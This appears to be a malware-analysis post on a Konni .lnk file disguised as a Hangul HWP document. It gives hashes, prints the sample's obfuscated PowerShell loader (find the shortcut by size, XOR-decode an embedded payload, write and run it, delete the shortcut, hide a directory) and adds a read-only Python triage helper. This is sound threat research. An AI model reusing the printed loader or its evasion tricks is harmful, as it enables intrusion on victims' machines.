Malware created by the North Korean hacking group Konni: 북한 내부정보시장통제 관련 내부 동향 및 물가.hwp.lnk (2024.4.4)
Today I will write about 북한 내부정보시장통제 관련 내부 동향 및 물가.hwp.lnk (2024.4.4), a piece of malware created by the North Korean hacking group Konni. The malware is an .lnk (Windows shortcut) file dressed up to look like an HWP attachment, the document format of Hancom's Hangul word processor. If the victim takes it for an HWP document and opens it, the shortcut launches PowerShell, and the malware runs through that PowerShell script. First, the hash values of the malware are as follows.
File name: 북한 내부정보시장통제 관련 내부 동향 및 물가.hwp.lnk
Size: 161 KB
MD5:3334d2605c0df26536058f73a43cb074
SHA-1:ebcd247c5ff2babe6ad1f001b4827549391c515c
SHA-256:ba59f1ece68fa051400fd46467b0dc0a5294b8644c107646e75d225a45fff015
PowerShell code
c zyBeQRaffsdBmhotKxfTsLks(y)VdfYfmvNPf(N)CunXYTuCBdHAcfYzydPPoiFUNVhagGQ xcARpkhUyqGQvnBcSgMXJZqytPsjcLtwVoixAoJorioxG(t)j(F)jTpUtKfyMcvzSXRPWjVgedz BwwEzKSSaEMajuzckhKMyThvtrzAvxcAfrMvXeEPUjvVfXGsvgKYurbKoakhjquABjV(S)HdffB VSpvmqwLgepPdgNpcgWUwECPUsVcPLsbCuyyMobKNwckfNxdgAFWimfqozAUuuWvMnjHG(n)CPe mfZAsHgURVm(e)vTrpikkMhoszGxSBRvTYSRWffPVSuZCyKqquTsxcscXYNxUVRCduconFWkitq sqhKTRqhwJx(Y)Q(F)PU(Y)sH(V)ab9R(W)ivucKxHieMZLPoUGCMsVFvmHxMYSAyprymzvuowY boTdGdeJyaqnHWqNjNCYyQHFv(H)mBNwkppuTqBhbuGoszhcJCW(N)mHKxxkFnHYSBWbPaXncZj bLhrjwhwtYHGakBERWGLpzcCesrMgevzWBkXBgnPwR(n)aiWVRkugrunVzHCnSeuppBhKwZFcKHT nxmcuiwAzLYeeHHLpYUvKczYxbkxRFsvJBZvnEidtCVCqxcbPopeRmikYn(E)tXZKVsAuBJmwKQQ bfgWGZZiJBpnFwtPwZaPfuTZkQcysAREpajcdbFEuNphEfWYiUPwKaJGmhLSXyRgLKYEmrKvsu(t)re LueTeqxNsVprCQWqPHVXhvUhqLRjseoFq0002858AtrQHnJANfENxuXpzXBtyntoGJabo(i)KQQMENd eycbownyzgWEkmJvxJeadhZnHnCuQXMQimvxyrjRfQfAewcXbtrdzNaWyQtbTSKBufvZRjWfxnUnbwi kkF(t)vFJoumyYJYiXofBgYadgRwkEnTMUcGhQnxoXMRaNqknhppFhxqjjgyBYudbByEWcQsKRSFugaq REjcpXnEuLvYJPV(p)BHQxnMpjrWFQqTVdiRHYPrPeoVijFSKWWAdMrBcepZKsqxnBRsPSfXzjUKirB eEzmJUPQiLGNCHQGuNRGGtmdSRZb(T)SHtKAkujgHEyMGHgeAoLCyWrLWKrwtTV||goto&po^w^e^rs he^l^l -windowstyle hidd(e)n function UJw(u)ElHWKh(){$ksGFWhHpfZ=Get-ChildItem *.lnk;$ksGFWhHpfZ=$k(s)GFWhHpfZ^|where-object{$_.length -eq 0x0002858A};$zHWgpc hixy(=)$ksGFWh(H)pfZ;$ksGFWhHpfZ=$ksGFWhHpfZ^|Select-Object -ExpandProperty Nam e;if($ksGFWhHpfZ(.)length -eq 0){cd $env:TEMP;$ksGFWhHpfZ=Get-ChildItem *(.)ln k;$k(s)GFWhHpfZ=$ksGFWhHpfZ^|where-object {$_.length -eq 0x0(0)02858A} ;$zHWgpc hixy=$ksGFWhH(p)fZ;$ksGFWh(H)pfZ=$ksGFWhHpfZ^|Select-Object -ExpandProperty Nam e;}return @($ksGFWhHpfZ, $zHWgpchi(x)y)};function xnMzgCQGES(){$zdLIXjAqBy=UJwu ElHWKh;$ksG(F)WhHpfZ=$zdLIXjAqBy[0];$ksGFWhHpfZ=$ksGFWhHpfZ.substring(0,$ksGFWh HpfZ.length-4);return $k(s)GFWhHpfZ};function msGSqHXiPb{$zdLIXjAqBy=xnMzgCQGES ;$(p)ovIjhOBgz(=)UJwuElHWKh(;)$ksGFWhHpfZ=$povIjhOBgz[0];$IUihtynbEF=[System.IO 
.BinaryReader]::n(e)w([System.IO.File]::(o)pen($ksGFWhHpfZ,[System.IO.FileMode] ::Open,[System.IO(.)FileAccess]::ReadWrite,[System(.)IO.FileShare]::None));try{ $IUihtynbEF.BaseStream.Seek(0x(0)0001DF1,[System(.)IO.SeekOrigin]::Beg(i)n);$Oz SR(Y)WosVJ=$IUihtynbEF.ReadBytes(0x0(0)00CE00);}finally{$IUihtynbEF.Close()};fo r($RJPVDAeoNg=0; $RJPVDAeoNg -lt $OzSRYWosVJ.coun(t); $RJP(V)DAeoNg++) { $OzSRY WosVJ[$RJPVD(A)eoNg]=$OzSRY(W)osVJ[$RJP(V)DAeoNg] -(b)xor 0xA1 };[System.IO(.)F ile]::W(r)iteAllBytes($zdL(I)XjAqBy,$OzSRYWosVJ);$yujRnfzHNA='.\'(+)$zdLIXjAqBy ;^& $yujR(n)fzHNA;return 'npXIZBhRQd'};$yuj(R)nfzHNA=msGSqHXiPb(;)$eHjrSJd(k)NK =UJwuElHWKh;remove-item -path $eHjrSJdkNK[1] -forc(e);&mkdir c:\LNjyqJhtie (&) attrib +h c:\LNj(y)qJhtie & cd /d c:\LNjyqJhti(e) & …
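As an added defensive example (not code from the original post and not the malware's own script), the Python triage helper below replays the loader's carve step read-only: it checks the ShellLink header, the exact file size the script's where-object filter expects, the caret-split PowerShell launcher string, and XOR-decodes the bytes at offset 0x1DF1 (length 0xCE00, key 0xA1) to see whether an OLE/HWP decoy comes out. The LNK bytes it runs on are constructed here rather than the real sample; the ShellLink CLSID and the OLE signature are standard format constants.

```python
from dataclasses import dataclass

LNK_MAGIC = b"L\x00\x00\x00"                      # ShellLink HeaderSize 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
OLE_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")     # HWP 5.x is an OLE compound file
CARET_PS = "goto&po^w^e^r"                        # caret-split 'powershell' seen in the post

# Values the loader in the post hard-codes
LOADER_LNK_SIZE = 0x0002858A
PAYLOAD_OFFSET = 0x00001DF1
PAYLOAD_LENGTH = 0x0000CE00
XOR_KEY = 0xA1

@dataclass
class Triage:
    is_lnk: bool            # ShellLink header magic and CLSID present
    size_matches: bool      # exact size the loader's where-object filter expects
    caret_powershell: bool  # obfuscated launcher string present in the arguments
    payload: bytes          # decoded bytes the loader would write out as the .hwp
    looks_like_hwp: bool    # decoded bytes start with the OLE signature

def triage_lnk(data: bytes, offset: int = PAYLOAD_OFFSET,
               length: int = PAYLOAD_LENGTH, key: int = XOR_KEY) -> Triage:
    """Read-only re-implementation of the loader's carve step: no execution, no file writes."""
    is_lnk = data[:4] == LNK_MAGIC and data[4:20] == LNK_CLSID
    caret = (CARET_PS.encode("utf-16-le") in data) or (CARET_PS.encode() in data)
    chunk = data[offset:offset + length]           # short read if the file is truncated
    payload = bytes(b ^ key for b in chunk)
    return Triage(is_lnk, len(data) == LOADER_LNK_SIZE, caret, payload,
                  payload.startswith(OLE_MAGIC))

def build_sample() -> bytes:
    """Constructed stand-in for the real .lnk (not the actual sample): header,
    caret-obfuscated arguments, filler, then an XOR-encoded fake HWP (one OLE header sector)."""
    header = (LNK_MAGIC + LNK_CLSID).ljust(0x4C, b"\x00")
    args = ("||" + CARET_PS + "s^h^e^l^l -windowstyle hidden").encode("utf-16-le")
    fake_hwp = OLE_MAGIC + b"\x00" * 504
    encoded = bytes(b ^ XOR_KEY for b in fake_hwp)
    body = (header + args).ljust(PAYLOAD_OFFSET, b"\x00") + encoded
    return body.ljust(LOADER_LNK_SIZE, b"\x00")

if __name__ == "__main__":
    t = triage_lnk(build_sample())
    print(f"lnk={t.is_lnk} size_ok={t.size_matches} caret_ps={t.caret_powershell} "
          f"hwp_decoy={t.looks_like_hwp} decoded_bytes={len(t.payload)}")
```

Run it against a suspect .lnk by passing the file's bytes to triage_lnk; a decoded payload that starts with the OLE signature is the decoy document the loader would have dropped next to the shortcut.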
IoC